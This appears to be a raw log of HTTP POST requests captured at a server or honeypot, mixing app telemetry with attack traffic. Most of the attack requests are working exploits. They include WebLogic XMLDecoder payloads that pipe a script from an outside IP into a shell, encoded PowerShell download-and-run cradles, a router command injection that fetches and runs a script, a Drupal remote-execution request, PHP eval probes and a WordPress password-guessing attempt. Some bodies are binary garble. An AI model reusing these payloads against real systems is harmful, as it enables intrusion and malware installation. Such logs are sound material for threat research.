{"module":"searchengine","mcc":"510","sdkver":"1.14","appname":"iswipe","did":"6ccc52a8048214f","modulever":"39","language":"in_ID","channel":"2010002546"}
--cZO21cwcwnOShCsHHtt9imY0WmkhApO--


POST /db_session.init.php HTTP/1.1
Host: x.x.x.x:80
User-Agent: Mozilla/5.0
Connection: Close
Content-Type: application/x-www-form-urlencoded
Content-Length: 48

eval=die('Hello, Peppa!'.(string)(111111111*9));

POST /sheep.php HTTP/1.1
Host: x.x.x.x:80
User-Agent: Mozilla/5.0
Connection: Close
Content-Type: application/x-www-form-urlencoded
Content-Length: 22

m=die('Hello, Peppa!')

POST /hndUnblock.cgi HTTP/1.1
Accept: */*
Host: x.x.x.x
User-Agent: Wget(linux)
Content-Length: 384
Content-Type: application/x-www-form-urlencoded

submit_button=&change_action=&action=&commit=&ttcp_num=2&ttcp_size=2&ttcp_ip=-h `%63%64%20%2F%74%6D%70%3B%72%6D%20%2D%66%20%6E%6D%6C%74%31%2E%73%68%3B%77%67%65%74%20%2D%4F%20%6E%6D%6C%74%31%2E%73%68%20%68%74%74%70%3A%2F%2F%64%6F%6D%73%74%61%74%65%73%2E%73%75%2F%6E%6D%6C%74%31%2E%73%68%3B%63%68%6D%6F%64%20%2B%78%20%6E%6D%6C%74%31%2E%73%68%3B%2E%2F%6E%6D%6C%74%31%2E%73%68`&StartEPI=1

POST http://cfg.cml.ksmobile.com/post HTTP/1.1
Accept-Encoding: gzip
Content-Length: 1025
Content-Type: multipart/form-data; boundary=z1ByJZ6qyrSVX6JIN4abeDFhqwEN1gw
Host: cfg.cml.ksmobile.com
Connection: Keep-Alive

--z1ByJZ6qyrSVX6JIN4abeDFhqwEN1gw
Content-Disposition: form-data; name="protocver"
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit

1
--z1ByJZ6qyrSVX6JIN4abeDFhqwEN1gw
Content-Disposition: form-data; name="ran"
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit

766602
--z1ByJZ6qyrSVX6JIN4abeDFhqwEN1gw
Content-Disposition: form-data; name="sig"
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit

bb0a49bd73b947ee14ccb283d7a89812
--z1ByJZ6qyrSVX6JIN4abeDFhqwEN1gw
Content-Disposition: form-data; name="flag"
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit

0
--z1ByJZ6qyrSVX6JIN4abeDFhqwEN1gw
Content-Disposition: form-data; name="data"
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit

{"module":"searchengine","mcc":"510","sdkver":"1.14","appname":"iswipe","did":"6ccc52a8048214f","modulever":"39","language":"in_ID","channel":"2010002546"}
--z1ByJZ6qyrSVX6JIN4abeDFhqwEN1gw--


POST /wls-wsat/CoordinatorPortType HTTP/1.1
Host: x.x.x.x:80
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:5.0) Gecko/20100101 Firefox/5.0
Connection: Close
Content-Type: text/xml
Content-Length: 1187

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
<soapenv:Header>
<work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
<java version="1.8.0_131" class="java.beans.XMLDecoder">
<void class="java.lang.ProcessBuilder">
  <array class="java.lang.String" length="3">
    <void index="0">
      <string>cmd.exe</string>
    </void>
    <void index="1">
      <string>/c</string>
    </void>
    <void index="2">
      <string>Start /Min PowerShell.exe -NoP -NonI -EP ByPass -W Hidden -E JABPAFMAPQAoAEcAVwBtAGkAIABXAGkAbgAzADIAXwBPAHAAZQByAGEAdABpAG4AZwBTAHkAcwB0AGUAbQApAC4AQwBhAHAAdABpAG8AbgA7ACQAVwBDAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAOwAkAFcAQwAuAEgAZQBhAGQAZQByAHMAWwAnAFUAcwBlAHIALQBBAGcAZQBuAHQAJwBdAD0AIgBQAG8AdwBlAHIAUwBoAGUAbABsAC8AVwBMACAAJABPAFMAIgA7AEkARQBYACAAJABXAEMALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAOgAvAC8AMQAwADEALgAyADAAMAAuADQANQAuADcAOAAvAGkAbQBhAGcAZQBzAC8AdABlAHMAdAAvAEQATAAuAHAAaABwACcAKQA7AA==</string>
    </void>
  </array>
    <void method="start"/>
</void>
</java>
</work:WorkContext>
</soapenv:Header>
<soapenv:Body/>
</soapenv:Envelope>


POST /wls-wsat/CoordinatorPortType11 HTTP/1.1
Host: x.x.x.x:7001
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36
Content-Length: 556
Content-Type: text/xml
Accept-Encoding: gzip
Connection: close

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"> <soapenv:Header> <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/"> <java> <void class="java.lang.ProcessBuilder"> <array class="java.lang.String" length="3"> <void index="0"> <string>/bin/bash</string> </void> <void index="1"> <string>-c</string> </void> <void index="2"> <string>curl http://94.250.253.178/logo8.sh | sh</string> </void> </array> <void method="start"/> </void> </java> </work:WorkContext> </soapenv:Header> <soapenv:Body/> </soapenv:Envelope>

POST http://check.proxyradar.com/azenv.php?auth=149564936935&a=PSCMN&i=1082769359&p=80 HTTP/1.1
Cookie: testCookie=true
Host: check.proxyradar.com
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)
Referer: https://proxyradar.com/
Content-Type: application/x-www-form-urlencoded
Content-Length: 13
Connection: close

testPost=true



POST http://apkquery.ksmobile.net/fqexpack HTTP/1.1
Charset: UTF-8
Content-Type: multipart/form-data; boundary=----------------------------7d92221b604bc
User-Agent: Dalvik/1.6.0 (Linux; U; Android 4.4.4; MI 4LTE MIUI/V7.00.55.00.KXDMICI)
Host: apkquery.ksmobile.net
Connection: Keep-Alive
Accept-Encoding: gzip
Content-Length: 59

;∂.-gRZr
9V_^$k^^
Fyc5.úfiiÛqÆÅ'R∏
≥i´˜∑3PßÄÚ!ßnD

POST /wuwu11.php HTTP/1.1
Host: x.x.x.x:80
User-Agent: Mozilla/5.0
Connection: Close
Content-Type: application/x-www-form-urlencoded
Content-Length: 29

h=die((string)(111111111*9));

POST http://check.proxyradar.com/azenv.php?auth=149661776009&a=PSCMN&i=2335900298&p=8080 HTTP/1.1
Cookie: testCookie=true
Host: check.proxyradar.com
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)
Referer: https://proxyradar.com/
Content-Type: application/x-www-form-urlencoded
Content-Length: 13
Connection: close

testPost=true



POST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; ASJB; rv:11.0) like Gecko
Host: x.x.x.x
Content-Length: 368
Cache-Control: no-cache

VA23nX0WB6moh90T2jBOAvkC/3ywq7VBt8t8DF1MoM4YGDpK4eTfnheY59tVsVXzvqFawnI036hHyLKwd75ZBxvve+gAFggAVlGEgM6YDF781PbbqLCYUAU6CMI59j7TnMyNsgiS+tfahMRXvokGzFrai+qlCzxWCWTXBOxvkXRonADWr/ZvVMaaSzxEwV9E9+Ynk3KcR7zxTmUXOyLQAliF8/sNo1UUlNZkz3mou+++iB9pfiMSbPk3qaJ4+fDKu+TVZQm11XMEs9X7Giw9AWe5E886BbtWfvLRo3Wq7Tnc8KczPoWSEQRDXXll07Kb9srjUCsAcSki+Zl/0smgeF2r+RP0GO1VmXXfDSEI1o3wFyk=

POST /wls-wsat/CoordinatorPortType11 HTTP/1.1
Host: x.x.x.x:7001
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36
Content-Length: 556
Content-Type: text/xml
Accept-Encoding: gzip
Connection: close

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"> <soapenv:Header> <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/"> <java> <void class="java.lang.ProcessBuilder"> <array class="java.lang.String" length="3"> <void index="0"> <string>/bin/bash</string> </void> <void index="1"> <string>-c</string> </void> <void index="2"> <string>curl http://94.250.253.178/logo8.sh | sh</string> </void> </array> <void method="start"/> </void> </java> </work:WorkContext> </soapenv:Header> <soapenv:Body/> </soapenv:Envelope>

POST /sheep.php HTTP/1.1
Host: x.x.x.x:80
User-Agent: Mozilla/5.0
Connection: Close
Content-Type: application/x-www-form-urlencoded
Content-Length: 28

m=die((string)(111111111*9))

POST /wls-wsat/CoordinatorPortType11 HTTP/1.1
Host: x.x.x.x:7001
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36
Content-Length: 556
Content-Type: text/xml
Accept-Encoding: gzip
Connection: close

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"> <soapenv:Header> <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/"> <java> <void class="java.lang.ProcessBuilder"> <array class="java.lang.String" length="3"> <void index="0"> <string>/bin/bash</string> </void> <void index="1"> <string>-c</string> </void> <void index="2"> <string>curl http://94.250.253.178/logo8.sh | sh</string> </void> </array> <void method="start"/> </void> </java> </work:WorkContext> </soapenv:Header> <soapenv:Body/> </soapenv:Envelope>

POST /wls-wsat/CoordinatorPortType11 HTTP/1.1
Host: x.x.x.x:7001
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36
Content-Length: 556
Content-Type: text/xml
Accept-Encoding: gzip
Connection: close

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"> <soapenv:Header> <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/"> <java> <void class="java.lang.ProcessBuilder"> <array class="java.lang.String" length="3"> <void index="0"> <string>/bin/bash</string> </void> <void index="1"> <string>-c</string> </void> <void index="2"> <string>curl http://94.250.253.178/logo8.sh | sh</string> </void> </array> <void method="start"/> </void> </java> </work:WorkContext> </soapenv:Header> <soapenv:Body/> </soapenv:Envelope>

POST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
Host: x.x.x.x
Content-Length: 440
Cache-Control: no-cache

QfFck9jIMXHw+glkGFjFMp3/ABI5e7oogYdb7hXSxHhlj19Sj9XnZnDq5rcdAEHfK32UJ85lKiwXB2XtfB1fGzcM75jL63cKsjufnEzb4ABTUK58m6Ie7apPeZlROTk65ZqnvBUiS9lnxC+2WnuXaza08N4d2rxDkjjF9wnL6kCJk7RkI5Hw+B1nlidK4QnF6jt0+3adxJXE+k1c1TZClSa9ZIVxtAqyWMXnyd+Qg1FFkZedqHd9EBOv01WH0LmYLqjoSd9kpyATPiHD9k/ABrF0c64g5EUf43Xtje8XX82ihiwUPQInGmLgjVXhZJqGy3/Y8pTLyZKTl6/3Rtmcg0uaTTEGuwHvSG03gjue+87e/Vcs6P7tXNMwEu3ka3FfLFTTGT4ZYCOTYQH7NwWxoXGCtNSXAA9bg1A89g3KHrTj+Wq0hs3g5qg=

POST /wls-wsat/CoordinatorPortType HTTP/1.1
Host: x.x.x.x:80
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:5.0) Gecko/20100101 Firefox/5.0
Connection: Close
Content-Type: text/xml
Content-Length: 1195

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
<soapenv:Header>
<work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
<java version="1.8.0_131" class="java.beans.XMLDecoder">
<void class="java.lang.ProcessBuilder">
  <array class="java.lang.String" length="3">
    <void index="0">
      <string>cmd.exe</string>
    </void>
    <void index="1">
      <string>/c</string>
    </void>
    <void index="2">
      <string>Start /Min PowerShell.exe -NoP -NonI -EP ByPass -W Hidden -E JABPAFMAPQAoAEcAVwBtAGkAIABXAGkAbgAzADIAXwBPAHAAZQByAGEAdABpAG4AZwBTAHkAcwB0AGUAbQApAC4AQwBhAHAAdABpAG8AbgA7ACQAVwBDAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAOwAkAFcAQwAuAEgAZQBhAGQAZQByAHMAWwAnAFUAcwBlAHIALQBBAGcAZQBuAHQAJwBdAD0AIgBQAG8AdwBlAHIAUwBoAGUAbABsAC8AVwBMACsAIAAkAE8AUwAiADsASQBFAFgAIAAkAFcAQwAuAEQAbwB3AG4AbABvAGEAZABTAHQAcgBpAG4AZwAoACcAaAB0AHQAcAA6AC8ALwAxADEAMQAuADIAMwAwAC4AMgAyADkALgAyADIANgAvAGkAbQBhAGcAZQBzAC8AdABlAHMAdAAvAEQATAAuAHAAaABwACcAKQA7AA==</string>
    </void>
  </array>
    <void method="start"/>
</void>
</java>
</work:WorkContext>
</soapenv:Header>
<soapenv:Body/>
</soapenv:Envelope>


POST http://check.proxyradar.com/azenv.php?auth=149649063497&a=PSCMN&i=1082784101&p=80 HTTP/1.1
Cookie: testCookie=true
Host: check.proxyradar.com
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)
Referer: https://proxyradar.com/
Content-Type: application/x-www-form-urlencoded
Content-Length: 13
Connection: close

testPost=true



POST http://t7.proxy-checks.com/favicon.ico HTTP/1.1
Host: t7.proxy-checks.com
Proxy-Connection: Keep-Alive
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.21022; .NET CLR 3.5.30729; .NET CLR 3.0.30618)
Accept-Language: en-US;q=0.6,en;q=0.4
Content-Length: 0
Pragma: no-cache



POST /wls-wsat/CoordinatorPortType11 HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Content-Type: text/xml
Accept: text/html, application/xhtml+xml, */*
Accept-Encoding: gbk, GB2312
Accept-Language: zh-cn
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Upgrade-Insecure-Requests: 1
Content-Length: 809
Host: x.x.x.x:7001

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
     <soapenv:Header>
     <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
     <java version="1.8.0_131" class="java.beans.XMLDecoder">
     <void class="java.lang.ProcessBuilder">
     <array class="java.lang.String" length="3">
     <void index="0">
     <string>cmd</string>
     </void>
     <void index="1">
     <string>/c</string>
     </void>
     <void index="2">
     <string>powershell (new-object System.Net.WebClient).DownloadFile('','C:/Windows/temp/searsvc.exe');start C:/Windows/temp/searsvc.exe</string>
     </void>
     </array>
     <void method="start"/></void>
     </java>
     </work:WorkContext>
     </soapenv:Header>
     <soapenv:Body/>
    </soapenv:Envelope>

POST http://check.proxyradar.com/azenv.php?auth=149551543589&a=PSCMN&i=2335900298&p=8080 HTTP/1.1
Cookie: testCookie=true
Host: check.proxyradar.com
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)
Referer: https://proxyradar.com/
Content-Type: application/x-www-form-urlencoded
Content-Length: 13
Connection: close

testPost=true



POST http://check.proxyradar.com/azenv.php?auth=152804410593&a=PSCMN&i=759097799&p=3128 HTTP/1.1
Cookie: testCookie=true
Host: check.proxyradar.com
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)
Referer: https://proxyradar.com/
Content-Type: application/x-www-form-urlencoded
Content-Length: 13
Connection: close

testPost=true



POST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
Host: x.x.x.x
Content-Length: 364
Cache-Control: no-cache

Q6QPxY/LY8jwFad8zx4evrfIUcRyFd05WHNfMuRcEXM+yV3fmi6TwMXYj4/I8BJt9phhv5I+x/xX3LQJeasjSZSg6wxyVF5GG6Ve0+LIsccolydDcGyB4/DfLXvSO9KcY/GCMI3wVXPypD0huw1ipGtmr70E20U0E8YPTGdtmtUp50fOTCnQxwE1FB9ffdbIiZxX+isz1tFRmyc+dd86S5hnLD2qTCRjuxS7+MuBZ+zBm8qE8mE83aO2CVPu7GBqubpnK0MoR1464whLthcDJCcAXHof64RuwIpwXmdd8IXjrRrx6DSs/II+0rOW979C9SK+odbxDlWogfhoAd56dAmWzSUQ6zYRmpl6ZgpQn0dZ

POST http://infoc2.duba.net/c/ HTTP/1.1
Content-Length: 129
Host: infoc2.duba.net
Connection: Keep-Alive
User-Agent: Apache-HttpClient/UNAVAILABLE (java 1.4)

Å
«™›^Ã≈*ÄH!O“§∞î˛
º¶º¶º·Ê•¡Ã
∏–·ÈÁ·≈¡®ºƒ‹ÕΩÎÏπºÓ∏±
∏s≈¡®ºƒ‹Õ–·ÈÁ·∞îVJY›∆√«∆fl

POST /wp-login.php HTTP/1.1
Referer: http://jamesatchue.com/wp-login.php
Accept: */*
Accept-Language: zh-cn
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; 125LA; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)
Host: jamesatchue.com
Content-Length: 30
Cache-Control: no-cache

log=jamesatchue&pwd=qwertyuiop

POST /user/register?element_parents=account/mail/%23value&ajax_form=1&_wrapper_format=drupal_ajax HTTP/1.1
Cache-Control: no-cache
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)
Host: x.x.x.x:80
Content-Type: application/x-www-form-urlencoded
Content-length: 170

form_id=user_register_form&_drupal_ajax=1&mail%5B%23post_render%5D%5B%5D=exec&mail%5B%23type%5D=markup&mail%5B%23markup%5D=wget%20http%3A%2F%2F51.254.219.134%2Fdrupal.php

POST http://infoc2.duba.net/c/ HTTP/1.1
Content-Length: 129
Host: infoc2.duba.net
Connection: Keep-Alive
User-Agent: Apache-HttpClient/UNAVAILABLE (java 1.4)

Å
ÜôOÃÃ≈*ÄH!O“§∞î˛
º¶º¶º·Ê•¡Ã
∏–·ÈÁ·≈¡®ºƒ‹ÕΩÎÏπºÓ∏±
∏s≈¡®ºƒ‹Õ–·ÈÁ·∞îÆ˛Y›∆√«∆fl

POST /?q=/file/ajax/name/%23value/ HTTP/1.1
Host: x.x.x.x:8080
User-Agent: python-requests/2.19.1
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive
Content-Length: 14
Content-Type: application/x-www-form-urlencoded

form_build_id=

POST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; InfoPath.3; .NET4.0E)
Host: x.x.x.x
Content-Length: 376
Cache-Control: no-cache

EaIPw9uZZVESDKfURZcBl4HW7rCnbifESyJ4uqYZvpvc2hopVxC7uPavcie94LWThEFfcTOzvPFnRBn9sj+ZYNE7L+w6Pwdw6aagqnVmoX4fJvtQtfbHtjQYmuW63uSxBHMp1IIHxFkDuH8PmaldMS8JIW7ZiT4OxEMBKqNdF/yV1MpTkcPAPLjwTeJXtR4cqAc/s1cKowoPUcUC7dGHmmd6biU30b/C+y90HW++ftA21BFiF4NCs9ZmM40mjasvawEA8z9yZSKra/rRVwRs8nTi7q07k8hHBc6oK/jnNBmKsIO7y8VTXndq5PajrV0NJD7WPr/RLrp2qWcYYYf4yvSn7xAneMn6bWeOOe474k2ROsBD4Ghrpiw=

POST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Host: x.x.x.x
Content-Length: 436
Cache-Control: no-cache

RfFfx9zKYOg3ARbQPRnzbw/uidttKI47+vfQuZBK24wbm8HixlH03Dy90tXHt+XZUbeD6KVlyazj0U+JraR49Uu9O7QFS97JCOUAN/SvDIKYqXIFD4hUsucJ4E0wN12efSJZ4gSiWCxU29nJab+9TCfXNOKuQ4sPBWe2YL6MiTU65wliYOJ7v2a/1Dlvj3frufivgxCgPjYYlT+DopuCZuQrrJvb0kuuUd+OSqXQU3ovzdPM2NSVFamTej4o3jy+kL+p3G3EqYDqNvijPUXAGhvWVAPt2ehktE2qBY6z1XMnLVqpc8Ln6cqacxCJdcrbxle5k2MnvXWnq7GqQhcRfIcaHYVdChVjRI4k2/nXG9DR46hnhb/doTuBNhqwj3ju7v2f7CeXDB7q0FDaCN1QDsyyJpC1GwiqUPAEy3NYxVhgD6olL1Xa

POST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Host: x.x.x.x
Content-Length: 428
Cache-Control: no-cache

E6JaxtPKbYZF+HoFqxaMWfL0RsafdA9blkyrCuAPy/74GiBAtOmGJXgIWQuvHXYSvAJ8cq8xoLh6d3PaYUFQss6mvReAmpUXFQTnJn3haMzPn2uPdFkwORK98v7o7rj3kopH0Mca9unef/CFCQaAU3bk1tNM9E3v8UlT1KPmEUDNokpfinP0P/LheWavG6tWx8KHcIOw4v5C8mN2GDv2oADmN/Q+uwPmH+vmU6YSz6C97XsjPYuv69ZLyIdVCjQRw/49cc43RNPZcw/vz5RPdHErUbbJhhaLooj29Iyw1riuEEeMN4PgB6VgSXFELikvt0vjZ+oWB5sWjGV0RZnkL6tzRQXvWNsjZohcFa3EDFmUfcRjh5/0vsQwisPLnUY9b3OKREv2sgQ9lA3zXrYhjmRjR4fIOvCefZBQpHhzYd4=

POST /db.init.php HTTP/1.1
Host: x.x.x.x:80
User-Agent: Mozilla/5.0
Connection: Close
Content-Type: application/x-www-form-urlencoded
Content-Length: 48

eval=die('Hello, Peppa!'.(string)(111111111*9));

POST /wls-wsat/CoordinatorPortType HTTP/1.1
Host: x.x.x.x:80
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:5.0) Gecko/20100101 Firefox/5.0
Connection: Close
Content-Type: text/xml
Content-Length: 1187



POST http://infoc2.duba.net/c/ HTTP/1.1
Content-Length: 129
Host: infoc2.duba.net
Connection: Keep-Alive
User-Agent: Apache-HttpClient/UNAVAILABLE (java 1.4)

Å
`äQ<Ã≈*ÄH!O“§∞î˛
º¶º¶º·Ê•¡Ã
∏–·ÈÁ·≈¡®ºƒ‹ÕΩÎÏπºÓ∏±
∏s≈¡®ºƒ‹Õ–·ÈÁ·∞îêô1Y›∆√«∆fl

POST http://infoc2.duba.net/c/ HTTP/1.1
Content-Length: 129
Host: infoc2.duba.net
Connection: Keep-Alive
User-Agent: Apache-HttpClient/UNAVAILABLE (java 1.4)

Å
˙PbÃ≈*ÄH!O“§∞î˛
º¶º¶º·Ê•¡Ã
∏–·ÈÁ·≈¡®ºƒ‹ÕΩÎÏπºÓ∏±
∏s≈¡®ºƒ‹Õ–·ÈÁ·∞îÏY›∆√«∆fl

POST /app_logs HTTP/1.1
X-Umeng-UTC: 1477775191889
X-Umeng-Sdk: Android/5.6.7 live.ly%2F3.3+GT-N8013%2F6.0.1+0C1D8E62E7F766B118C17CFA99A28899
Msg-Type: envelope
Transfer-Encoding: chunked
Content-Type: application/x-www-form-urlencoded
User-Agent: Dalvik/2.1.0 (Linux; U; Android 6.0.1; GT-N8013 Build/MOB30J)
Host: alog.umeng.co
Connection: Keep-Alive
Accept-Encoding: gzip

2b3
1.0575cfd16e0f55a5209001140@f6b495cc9d76e1b0ea07de2d87aa6cc9030ce7890bafd9a99c8b3fa9b53c0c58Ï”ÂÄû›xúïêMkA«á¥ij¨».è4H÷C÷y›yπ≈Rbµ®π	2Ÿô©ãõl…b∞=)¯rTÍ≈!û˚9<z~1±/zhPô”¿Û<ˇˇÔ◊é–Ï°6Äê"éd!¨†XcL«∞¿R}{˝˘Ÿ9àÚjò>}XîÖ≠ÏÓnZ_ÓEö"ÕR	+õUµS˙Ì“Ó	Wâ6úöô
eË∫Q‹Ù2√¥È	C7åX7òF…Ãubho⁄‚|Ü
%&«ÜK√î±\íÿyO¶ç¶’îu"h)Y»∞SDzîïdyÛ^˜ñ¬Ñ¡ZÔŒ÷Dv∂«UÓÎ∫w∆~“¡ùd"À+–Íç‹∏*4≥ߧ}∏úEjπ∫G¸	°–™Ì∞~<⁄âæº˙˙æÚá•≠€◊æ
'I®ùÅÜA£W°§53ìN’,¢v¸˝˘€˝}ts≠˘r±p¡¬eLµÃ	°›‹Ò–ÂÉ<t5ñ¨´¥tAk2`^«ÔfiÃ÷¢Z™˝∏∞%¨rÇe–x Ò@
wÒßG#Õ¬
ù¯õ´¯„Ò¸ä=D0•_µég¬nΩ‚öQÔ'/m~ä‡flπÔ√atÚo—f'ìπ'¡&Û`¸rò¸èC&ÛxB?
«b‹«@000095cc9d76e1b0ea07de2d87aa6cc9030ce7890bafd9a99c8b3fa9b53c0000 45073f5a0bdcd442978b484d89c842ea
0



POST /wls-wsat/CoordinatorPortType11 HTTP/1.1
Host: x.x.x.x:7001
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36
Content-Length: 556
Content-Type: text/xml
Accept-Encoding: gzip
Connection: close

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"> <soapenv:Header> <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/"> <java> <void class="java.lang.ProcessBuilder"> <array class="java.lang.String" length="3"> <void index="0"> <string>/bin/bash</string> </void> <void index="1"> <string>-c</string> </void> <void index="2"> <string>curl http://94.250.253.178/logo8.sh | sh</string> </void> </array> <void method="start"/> </void> </java> </work:WorkContext> </soapenv:Header> <soapenv:Body/> </soapenv:Envelope>

POST http://infoc2.duba.net/c/ HTTP/1.1
Content-Length: 129
Host: infoc2.duba.net
Connection: Keep-Alive
User-Agent: Apache-HttpClient/UNAVAILABLE (java 1.4)

Å
∂”â
Ã≈*ÄH!O“§∞î˛
º¶º¶º·Ê•¡Ã
∏–·ÈÁ·≈¡®ºƒ‹ÕΩÎÏπºÓ∏±
∏s≈¡®ºƒ‹Õ–·ÈÁ·∞îıÒY›∆√«∆fl

POST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Host: x.x.x.x
Content-Length: 404
Cache-Control: no-cache

FPEKxtLKZLUmQ38m74n0g2itc/Rb5Yhumo4daBnbXyp+5kGUcyQXblbY3EU6ME4MlVliDQjWS3vqaZzhYH+JBMeOD2aljahGG+IbzTwi5KEnqj1DeQlUg4A1+8vnlIg39edml/35U/QR44fsIAn5//p1AKtVB1nVn58Gy+LD1D12O23vCewRGVqhpffgXRyfsTmhcOS5zkS1UHF13v0RGB49Xzj1fEA468f+qGl1OLPyQXb4VjUFnBy9aEyU85/efDx3QwjPPXB+eBnNMTA9Bts+D7BFhc3xbtAV5BtgcBZpxaed7pph79z8u1ks7/4iJauFVYr5uxuZsYD20wMlpxEby+THMeOnzGmTWC+ZmlbCntv7o0+qjg1kLkroRvPVqF3N5j1ZLxhJcPBAXA==

POST http://market.xiaomi.com/thm/checkupdate/hashpair HTTP/1.1
Cookie: serviceToken=0QxjFrjieRMkJ7AH4gTZJJB7i/AE4FAwfcvaQeeZRjmYNLpd68wgPP8d8dNjhkPiNUZ19a+uM9QeraZIhcAhHcTGf+v3zPAsinFkt3ZEVhj6ix7LJl1+Jtgx8QOXp//SJY+GqTsKxII7jabjdfPy8ZnNeGf8QpEG290kf3rCW/fUbfA6ShVSenX25U5lEEnHSHUPWgRMTP6GBvDsDxrDew==; cUserId=UmHQgtJ2PWdwXIYZq1PwDfYMMzY
Content-Length: 749
Content-Type: application/x-www-form-urlencoded
Host: market.xiaomi.com
Connection: Keep-Alive



POST http://profile.adkmob.com/ud/ HTTP/1.1
Content-Length: 230
Content-Type: text/plain; charset=ISO-8859-1
Host: profile.adkmob.com
Connection: Keep-Alive
User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; MI 4LTE Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36

v=16&ac=50&pos=34100&mid=104&lan=in_ID&ext=&cmver=51424845&mcc=510&mnc=10&pl=2&channelid=2010002546&lp=0&gaid=8776479c-11a4-48e7-8a70-96e640a29187&aid=6ccc52a8048214f&attach=[{"res":0,"pkg":"com.screensaver.ad","des":"","sug":-1}]

POST http://infoc2.duba.net/c/ HTTP/1.1
Content-Length: 129
Host: infoc2.duba.net
Connection: Keep-Alive
User-Agent: Apache-HttpClient/UNAVAILABLE (java 1.4)

Å
t(ÛÃ≈*ÄH!O“§∞î˛
º¶º¶º·Ê•¡Ã
∏–·ÈÁ·≈¡®ºƒ‹ÕΩÎÏπºÓ∏±
∏s≈¡®ºƒ‹Õ–·ÈÁ·∞îgFY›∆√«∆fl

POST /wls-wsat/CoordinatorPortType11 HTTP/1.1
